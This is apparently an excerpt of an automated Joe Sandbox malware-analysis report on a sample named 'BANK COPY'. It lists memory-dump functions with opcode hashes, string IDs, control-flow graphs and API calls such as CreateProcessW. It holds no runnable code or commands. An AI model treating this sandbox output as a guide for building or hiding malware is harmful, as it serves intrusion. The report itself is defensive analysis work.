                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: D0k$Xck$Xck
                                                                                                    • API String ID: 0-1795155639
                                                                                                    • Opcode ID: d60f7fab18e0375caf785218774748cd61988d9776c7400c8aa0a5f3a1890800
                                                                                                    • Instruction ID: f860615e19ceb222ccebf1c171714602a420c0b89e77d9344bbd9cd8c517b616
                                                                                                    • Opcode Fuzzy Hash: d60f7fab18e0375caf785218774748cd61988d9776c7400c8aa0a5f3a1890800
                                                                                                    • Instruction Fuzzy Hash: 8002C2B4B002168FC724DB69C4856FEBBB6FF85204F25846AD40ADB361DB35DC46CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 174 75b63f8-75b641d 175 75b641f 174->175 176 75b6424-75b6460 174->176 175->176 246 75b6462 call 75b6a01 176->246 247 75b6462 call 75b6a10 176->247 179 75b6468 180 75b646f-75b648b 179->180 181 75b648d 180->181 182 75b6494-75b6495 180->182 181->179 183 75b649a-75b64b1 181->183 184 75b64da-75b64e6 181->184 185 75b663a-75b6647 181->185 186 75b673a-75b674f 181->186 187 75b67ff-75b6820 181->187 188 75b655e-75b656a 181->188 189 75b669d-75b66b5 181->189 190 75b65bc-75b65c0 181->190 191 75b64b3-75b64bf 181->191 192 75b66d3-75b66df 181->192 193 75b6592-75b65b7 181->193 194 75b6754-75b6758 181->194 195 75b67b4-75b67c9 181->195 196 75b6529-75b6532 181->196 197 75b67ce-75b67e0 181->197 198 75b65ec-75b65f8 181->198 199 75b664c-75b6658 181->199 200 75b6723-75b6735 181->200 201 75b6623-75b6635 181->201 202 75b6707-75b671e 181->202 203 75b67e5-75b67fa 181->203 204 75b6784-75b6788 181->204 205 75b6504-75b6524 181->205 182->183 182->187 183->180 224 75b64e8 184->224 225 75b64ed 184->225 185->180 186->180 210 75b656c 188->210 211 75b6571-75b658d 188->211 208 75b66bc-75b66ce 189->208 209 75b66b7 189->209 214 75b65d3-75b65da 190->214 215 75b65c2-75b65d1 190->215 218 75b64c1 191->218 219 75b64c6-75b64d8 191->219 212 75b66e1 192->212 213 75b66e6-75b6702 192->213 193->180 220 75b676b-75b6772 194->220 221 75b675a-75b6769 194->221 195->180 206 75b6545-75b654c 196->206 207 75b6534-75b6543 196->207 197->180 216 75b65fa 198->216 217 75b65ff-75b661e 198->217 226 75b665a 199->226 227 75b665f-75b6675 199->227 200->180 201->180 202->180 203->180 222 75b679b-75b67a2 204->222 223 75b678a-75b6799 204->223 205->180 230 75b6553-75b6559 206->230 207->230 208->180 209->208 210->211 211->180 212->213 213->180 233 75b65e1-75b65e7 214->233 215->233 216->217 217->180 218->219 219->180 228 75b6779-75b677f 220->228 221->228 229 75b67a9-75b67af 222->229 223->229 224->225 235 75b64f7-75b64ff 225->235 226->227 242 75b667c-75b6698 227->242 243 75b6677 227->243 228->180 229->180 230->180 233->180 235->180 242->180 243->242 246->179 247->179
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: oE h$oE h
                                                                                                    • API String ID: 0-3624717963
                                                                                                    • Opcode ID: 321fa30f5b3412ba4571be264fd1937860cc09578fae70eba08e8ede13fa0169
                                                                                                    • Instruction ID: c476c7be138a7c22fabf60b0f740a1730230e3fb0bcf5c2cc6b8dc6e42f0d37f
                                                                                                    • Opcode Fuzzy Hash: 321fa30f5b3412ba4571be264fd1937860cc09578fae70eba08e8ede13fa0169
                                                                                                    • Instruction Fuzzy Hash: 16D116B0D1461ADFCB58CF96C4818EEFBB2FF89300F258559D516AB258C734AA42CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 405 75b6330-75b6344 407 75b63a1-75b63cc 405->407 408 75b6346-75b6353 405->408 409 75b642b-75b6460 407->409 410 75b63ce-75b641d 407->410 408->407 483 75b6462 call 75b6a01 409->483 484 75b6462 call 75b6a10 409->484 415 75b641f 410->415 416 75b6424-75b6429 410->416 414 75b6468 417 75b646f-75b648b 414->417 415->416 416->409 418 75b648d 417->418 419 75b6494-75b6495 417->419 418->414 420 75b649a-75b64b1 418->420 421 75b64da-75b64e6 418->421 422 75b663a-75b6647 418->422 423 75b673a-75b674f 418->423 424 75b67ff-75b6820 418->424 425 75b655e-75b656a 418->425 426 75b669d-75b66b5 418->426 427 75b65bc-75b65c0 418->427 428 75b64b3-75b64bf 418->428 429 75b66d3-75b66df 418->429 430 75b6592-75b65b7 418->430 431 75b6754-75b6758 418->431 432 75b67b4-75b67c9 418->432 433 75b6529-75b6532 418->433 434 75b67ce-75b67e0 418->434 435 75b65ec-75b65f8 418->435 436 75b664c-75b6658 418->436 437 75b6723-75b6735 418->437 438 75b6623-75b6635 418->438 439 75b6707-75b671e 418->439 440 75b67e5-75b67fa 418->440 441 75b6784-75b6788 418->441 442 75b6504-75b6524 418->442 419->420 419->424 420->417 461 75b64e8 421->461 462 75b64ed 421->462 422->417 423->417 447 75b656c 425->447 448 75b6571-75b658d 425->448 445 75b66bc-75b66ce 426->445 446 75b66b7 426->446 451 75b65d3-75b65da 427->451 452 75b65c2-75b65d1 427->452 455 75b64c1 428->455 456 75b64c6-75b64d8 428->456 449 75b66e1 429->449 450 75b66e6-75b6702 429->450 430->417 457 75b676b-75b6772 431->457 458 75b675a-75b6769 431->458 432->417 443 75b6545-75b654c 433->443 444 75b6534-75b6543 433->444 434->417 453 75b65fa 435->453 454 75b65ff-75b661e 435->454 463 75b665a 436->463 464 75b665f-75b6675 436->464 437->417 438->417 439->417 440->417 459 75b679b-75b67a2 441->459 460 75b678a-75b6799 441->460 442->417 467 75b6553-75b6559 443->467 444->467 445->417 446->445 447->448 448->417 449->450 450->417 470 75b65e1-75b65e7 451->470 452->470 453->454 454->417 455->456 456->417 465 75b6779-75b677f 457->465 458->465 466 75b67a9-75b67af 459->466 460->466 461->462 472 75b64f7-75b64ff 462->472 463->464 479 75b667c-75b6698 464->479 480 75b6677 464->480 465->417 466->417 467->417 470->417 472->417 479->417 480->479 483->414 484->414
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: oE h
                                                                                                    • API String ID: 0-3804084906
                                                                                                    • Opcode ID: fbbccf99f01f2b9a152fa1782dedf4853f79e1685a16ab41a66d699dced1ed3b
                                                                                                    • Instruction ID: afe1de1215bc31ead2f3c9c49ad6e21d5ca7bced8ea0cb4b2d3ff2927c0368a2
                                                                                                    • Opcode Fuzzy Hash: fbbccf99f01f2b9a152fa1782dedf4853f79e1685a16ab41a66d699dced1ed3b
                                                                                                    • Instruction Fuzzy Hash: 7FE19BB1E1960ADFCB18CF95D4818EEFBB2FF89310F248566D505AB254C734AA42CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 485 75b6389-75b63cc 486 75b642b-75b6460 485->486 487 75b63ce-75b641d 485->487 560 75b6462 call 75b6a01 486->560 561 75b6462 call 75b6a10 486->561 492 75b641f 487->492 493 75b6424-75b6429 487->493 491 75b6468 494 75b646f-75b648b 491->494 492->493 493->486 495 75b648d 494->495 496 75b6494-75b6495 494->496 495->491 497 75b649a-75b64b1 495->497 498 75b64da-75b64e6 495->498 499 75b663a-75b6647 495->499 500 75b673a-75b674f 495->500 501 75b67ff-75b6820 495->501 502 75b655e-75b656a 495->502 503 75b669d-75b66b5 495->503 504 75b65bc-75b65c0 495->504 505 75b64b3-75b64bf 495->505 506 75b66d3-75b66df 495->506 507 75b6592-75b65b7 495->507 508 75b6754-75b6758 495->508 509 75b67b4-75b67c9 495->509 510 75b6529-75b6532 495->510 511 75b67ce-75b67e0 495->511 512 75b65ec-75b65f8 495->512 513 75b664c-75b6658 495->513 514 75b6723-75b6735 495->514 515 75b6623-75b6635 495->515 516 75b6707-75b671e 495->516 517 75b67e5-75b67fa 495->517 518 75b6784-75b6788 495->518 519 75b6504-75b6524 495->519 496->497 496->501 497->494 538 75b64e8 498->538 539 75b64ed 498->539 499->494 500->494 524 75b656c 502->524 525 75b6571-75b658d 502->525 522 75b66bc-75b66ce 503->522 523 75b66b7 503->523 528 75b65d3-75b65da 504->528 529 75b65c2-75b65d1 504->529 532 75b64c1 505->532 533 75b64c6-75b64d8 505->533 526 75b66e1 506->526 527 75b66e6-75b6702 506->527 507->494 534 75b676b-75b6772 508->534 535 75b675a-75b6769 508->535 509->494 520 75b6545-75b654c 510->520 521 75b6534-75b6543 510->521 511->494 530 75b65fa 512->530 531 75b65ff-75b661e 512->531 540 75b665a 513->540 541 75b665f-75b6675 513->541 514->494 515->494 516->494 517->494 536 75b679b-75b67a2 518->536 537 75b678a-75b6799 518->537 519->494 544 75b6553-75b6559 520->544 521->544 522->494 523->522 524->525 525->494 526->527 527->494 547 75b65e1-75b65e7 528->547 529->547 530->531 531->494 532->533 533->494 542 75b6779-75b677f 534->542 535->542 543 75b67a9-75b67af 536->543 537->543 538->539 549 75b64f7-75b64ff 539->549 540->541 556 75b667c-75b6698 541->556 557 75b6677 541->557 542->494 543->494 544->494 547->494 549->494 556->494 557->556 560->491 561->491
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: oE h
                                                                                                    • API String ID: 0-3804084906
                                                                                                    • Opcode ID: 706c3da5278faf3e210b3864e7d8ec8fb927a5068201c0703ae0612220aff287
                                                                                                    • Instruction ID: 4eff2dcb582a5d5c45ef4b8a8d1466d566de631a97c40c4340bd343ebe278228
                                                                                                    • Opcode Fuzzy Hash: 706c3da5278faf3e210b3864e7d8ec8fb927a5068201c0703ae0612220aff287
                                                                                                    • Instruction Fuzzy Hash: A9E18AB0E1460ADFCB18CF95D4818EEFBB2FF89310F24856AD505AB254C734AA42CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: '$`
                                                                                                    • API String ID: 0-2852639213
                                                                                                    • Opcode ID: fafa65836f60f1514f6b203ee842235a78d331452f6c8b98d041a7866d9831d2
                                                                                                    • Instruction ID: 6a1cacfd390e9b8818dab2263613e2a455f075ccfc64219f91cbc6e9b23d11bb
                                                                                                    • Opcode Fuzzy Hash: fafa65836f60f1514f6b203ee842235a78d331452f6c8b98d041a7866d9831d2
                                                                                                    • Instruction Fuzzy Hash: DA512CB0E1424ADFCB18CFA6C5416EEFBF2FF89600F24D42AD419A7265D7349A418F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: '$`
                                                                                                    • API String ID: 0-2852639213
                                                                                                    • Opcode ID: 02aa93f4f45c1b4823dbbf7626e336353e9f6c15963dd2a44c005935bf349e80
                                                                                                    • Instruction ID: 1dbe1c39953ff0963303e8d7e5e23604a66942c185a60977c2b53bce7cf2be87
                                                                                                    • Opcode Fuzzy Hash: 02aa93f4f45c1b4823dbbf7626e336353e9f6c15963dd2a44c005935bf349e80
                                                                                                    • Instruction Fuzzy Hash: 2E511BB0E1824ADFCB18CFA6C5416EEFBF2FB89200F24D42AD519A7255D7349A418F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 85121a36e709c0bd225c6e7ff06279aac36de1bd94a171f5cfa684f68325b40f
                                                                                                    • Instruction ID: c5cfdf3d4f6b2ee9a7a2b331117ce9bbb41951ea26d0950b942525974aa31a84
                                                                                                    • Opcode Fuzzy Hash: 85121a36e709c0bd225c6e7ff06279aac36de1bd94a171f5cfa684f68325b40f
                                                                                                    • Instruction Fuzzy Hash: C8B18D75E152188FDB14CFA9E8806EDFBB2FF89324F24812AD409AF255C7355946CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a345cc43b1ea1ee24ca138d7c25d4fd1c1c16e3f6dfa9630d27062b21af74b8
                                                                                                    • Instruction ID: 1c3e845e89017970372681a23ff2f59b64ba48399e14158faed14ab84dea0733
                                                                                                    • Opcode Fuzzy Hash: 9a345cc43b1ea1ee24ca138d7c25d4fd1c1c16e3f6dfa9630d27062b21af74b8
                                                                                                    • Instruction Fuzzy Hash: B6D17FB0914205CFCB54EFA9D6899DDBBF2FB49345B1494AAE405DB328DB309901CF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7ae679aa097210a1313c8c9c3a3c114fe246f5c03190e91e7dab418864101c7b
                                                                                                    • Instruction ID: 72484b7341f8a784a7e8dfcf4c8180b536df2f8450d3b59bf4e0247f74a80a97
                                                                                                    • Opcode Fuzzy Hash: 7ae679aa097210a1313c8c9c3a3c114fe246f5c03190e91e7dab418864101c7b
                                                                                                    • Instruction Fuzzy Hash: 5AB116B4E046198FCB14CFA9C5816EEFBF2FF89300F14C565D409AB358E774A9428B65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5cb9d4ca07d65a20ac5e59e87f8381081c2cf75b2425fd753d864d55fcff414b
                                                                                                    • Instruction ID: 43c3c8192de45359e32b5cbaea00a9e2dc2bd321c26bbecff4de509c37531ef8
                                                                                                    • Opcode Fuzzy Hash: 5cb9d4ca07d65a20ac5e59e87f8381081c2cf75b2425fd753d864d55fcff414b
                                                                                                    • Instruction Fuzzy Hash: 7081E2B4E102198FDB18CFA9D884AEEFBB2FF89300F10952AD419BB254D7359946CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b58bbed2dd5d18e80ca69d5e6f96aa5ae1450ffcfe9490ad1d7f960da2b1aaa5
                                                                                                    • Instruction ID: f6489f1d9f9f09b5ae6bcb0249b15651c10a1dd4e8ae2c571dd19f43e30f1d69
                                                                                                    • Opcode Fuzzy Hash: b58bbed2dd5d18e80ca69d5e6f96aa5ae1450ffcfe9490ad1d7f960da2b1aaa5
                                                                                                    • Instruction Fuzzy Hash: 34813A71E0562ACBDB68CF65CC457DDBBB2BF89300F1082EAD50DA7654EBB05A858F40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 41aec0ce4e9c596e77d588a638e40eb794097f90d6c2c02e059de0f193b51f11
                                                                                                    • Instruction ID: 92dcfaf37142497ac5854ced0dd6ea75cb2d5b8df05406ebb4de399e20480d71
                                                                                                    • Opcode Fuzzy Hash: 41aec0ce4e9c596e77d588a638e40eb794097f90d6c2c02e059de0f193b51f11
                                                                                                    • Instruction Fuzzy Hash: 0D613971D0576ACBDB28CF65CC447DABBB2AF89300F1482EAC508A7265EB745A85DF40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ff9129bf6a96971a8024f1fe4b31c1d445b77375bc2eb2244b677e8e83bde6be
                                                                                                    • Instruction ID: 7bdc235bd9f06da3fca8ae7f54522142c0338090e34b93b27290253dfb7545a4
                                                                                                    • Opcode Fuzzy Hash: ff9129bf6a96971a8024f1fe4b31c1d445b77375bc2eb2244b677e8e83bde6be
                                                                                                    • Instruction Fuzzy Hash: F1511571E1562ACFDB74CF64C984BDAB7B2BF89300F1082EAD109A6650E7B05AC58F40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ff1cc560751f7249aa4f5670bfbfb747c5521c9b649d198c71437205bb75e7b3
                                                                                                    • Instruction ID: 6a5081405327815c7ec0ad02ed9af8a7799c20a57df34c37b11e3c57704b7954
                                                                                                    • Opcode Fuzzy Hash: ff1cc560751f7249aa4f5670bfbfb747c5521c9b649d198c71437205bb75e7b3
                                                                                                    • Instruction Fuzzy Hash: F6219E71A00624CFDB14CF68D448BEEBBF2BF4D312F148469D045BB261C7789944CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 50eddd452881da5248b5ba8d00cc3a44bf30586105cccaf8e21e97f8600b4dd4
                                                                                                    • Instruction ID: 8e0910491840d5d6b578c38e2760b6853ef1f6dd30616cade5ffab20a69c7163
                                                                                                    • Opcode Fuzzy Hash: 50eddd452881da5248b5ba8d00cc3a44bf30586105cccaf8e21e97f8600b4dd4
                                                                                                    • Instruction Fuzzy Hash: A221F6B1E016189BDB28CFAAD8446DEBBB3FFC8310F14C06AD409A6264DB345A85CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dc67508a175d0130d2506d63000b62dbd3d93314499b4594217101c0a27e19e0
                                                                                                    • Instruction ID: c9298443e6d6b429fd092423e4a851d72257834736cdc9b65c309d9f30b2508b
                                                                                                    • Opcode Fuzzy Hash: dc67508a175d0130d2506d63000b62dbd3d93314499b4594217101c0a27e19e0
                                                                                                    • Instruction Fuzzy Hash: 4F21E7B1E006589BDB28CFABD8453DEBAF3AFC8300F14C16AD409A6258DB7459468F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f91e33caa35464d71c86944e08b6b78615cd5539df139a42fc7fbc05447f9cf
                                                                                                    • Instruction ID: 9450fe1140945fbe30dccc47aaef3415a8853378b378c8a77f7d9980d418374b
                                                                                                    • Opcode Fuzzy Hash: 5f91e33caa35464d71c86944e08b6b78615cd5539df139a42fc7fbc05447f9cf
                                                                                                    • Instruction Fuzzy Hash: 49115A70D04228CFCB14CFA9D4187EEBBF1AB4E312F14906AD445B3291CBB88984CF68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_75b0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dfd9f98483c89a963d78db4783533c2e81b0b6aa393d2989348fadf5067dffc0
                                                                                                    • Instruction ID: b21237d7b198595ed4300cc8cfeaa23047e754796b80ef232280e0aa6b214953
                                                                                                    • Opcode Fuzzy Hash: dfd9f98483c89a963d78db4783533c2e81b0b6aa393d2989348fadf5067dffc0
                                                                                                    • Instruction Fuzzy Hash: A61196B1E016488BDB18CFA7C9442DEFBF3BFC8310F14C169D409AA258DB7559468F40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78eb4b0cfc4a53253595eab7127c5fe9960d62d8288555f7c6d6e05c79b1635d
                                                                                                    • Instruction ID: 022482c15ef2a64e26e2c4405c71a215f2d72cd4c652cf38bdd1a3b54610686b
                                                                                                    • Opcode Fuzzy Hash: 78eb4b0cfc4a53253595eab7127c5fe9960d62d8288555f7c6d6e05c79b1635d
                                                                                                    • Instruction Fuzzy Hash: B6E09B5194C6B9CFD7114F6C48655BD7F71AB0B202F14108AD4C1BB552D6E88505C769
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 299 2ad9788-2ad979d call 2ad8a94 302 2ad979f 299->302 303 2ad97b3-2ad97b7 299->303 355 2ad97a5 call 2ad9a10 302->355 356 2ad97a5 call 2ad9a02 302->356 304 2ad97b9-2ad97c3 303->304 305 2ad97cb-2ad980c 303->305 304->305 310 2ad980e-2ad9816 305->310 311 2ad9819-2ad9827 305->311 306 2ad97ab-2ad97ad 306->303 309 2ad98e8-2ad99a8 306->309 348 2ad99aa-2ad99ad 309->348 349 2ad99b0-2ad99db GetModuleHandleW 309->349 310->311 313 2ad9829-2ad982e 311->313 314 2ad984b-2ad984d 311->314 315 2ad9839 313->315 316 2ad9830-2ad9837 call 2ad8aa0 313->316 317 2ad9850-2ad9857 314->317 320 2ad983b-2ad9849 315->320 316->320 321 2ad9859-2ad9861 317->321 322 2ad9864-2ad986b 317->322 320->317 321->322 323 2ad986d-2ad9875 322->323 324 2ad9878-2ad9881 call 2ad8ab0 322->324 323->324 329 2ad988e-2ad9893 324->329 330 2ad9883-2ad988b 324->330 332 2ad9895-2ad989c 329->332 333 2ad98b1-2ad98b5 329->333 330->329 332->333 334 2ad989e-2ad98ae call 2ad8ac0 call 2ad8ad0 332->334 353 2ad98b8 call 2ad9cf8 333->353 354 2ad98b8 call 2ad9d08 333->354 334->333 337 2ad98bb-2ad98be 338 2ad98e1-2ad98e7 337->338 339 2ad98c0-2ad98de 337->339 339->338 348->349 350 2ad99dd-2ad99e3 349->350 351 2ad99e4-2ad99f8 349->351 350->351 353->337 354->337 355->306 356->306
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02AD99CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.284410430.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 9235d461321944b137439478733317a4c48ecf8c1cf3515bb9f7a13b72fc36b8
                                                                                                    • Instruction ID: 97852fa3679b4dff5fedd084016ef7e6b5aeaf2d5b9c9fff785c5c4369db6207
                                                                                                    • Opcode Fuzzy Hash: 9235d461321944b137439478733317a4c48ecf8c1cf3515bb9f7a13b72fc36b8
                                                                                                    • Instruction Fuzzy Hash: 9C714470A00B058FD724DF29D59479BBBF1BF88708F008929D04ADBA50DB34E809CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 357 802164c-80216e3 359 80216e5-80216eb 357->359 360 80216ee-80216f5 357->360 359->360 361 8021700-8021716 360->361 362 80216f7-80216fd 360->362 363 8021721-80217be CreateProcessW 361->363 364 8021718-802171e 361->364 362->361 366 80217c0-80217c6 363->366 367 80217c7-802183b 363->367 364->363 366->367 375 802184d-8021854 367->375 376 802183d-8021843 367->376 377 8021856-8021865 375->377 378 802186b 375->378 376->375 377->378 380 802186c 378->380 380->380
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 080217AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.313893456.0000000008020000.00000040.00000800.00020000.00000000.sdmp, Offset: 08020000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_8020000_BANK COPY.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
